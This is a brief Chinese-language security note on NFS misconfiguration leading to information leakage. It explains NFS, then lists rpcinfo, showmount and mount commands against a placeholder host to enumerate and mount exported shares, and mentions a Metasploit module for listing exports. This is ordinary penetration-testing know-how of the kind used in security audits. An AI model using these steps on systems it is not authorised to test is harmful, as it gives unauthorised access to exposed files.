NFS配置不当导致信息泄露
NFS(Network File System)即网络文件系统,是FreeBSD支持的文件系统中的一种,它允许网络中的计算机之间通过TCP/IP网络共享资源。在NFS的应用中,本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件,就像访问本地文件一样。(来源百度)
NFS服务的默认开放端口为2049/TCP,因此我们可以借助Nmap来针对性的进行探测。
对存在NFS配置错误的主机进行扫描
rpcinfo -p xxx.xxx.xxx.xxx
查看NFS挂载的信息
showmount -e xxx.xxx.xxx.xxx
挂载NFS
mount -t nfs xxx.xxx.xxx.xxx:/opt/applications/xxx_static_data /mnt
另外,Metasploit框架中也有一个模块,可以用来列出导出文件夹。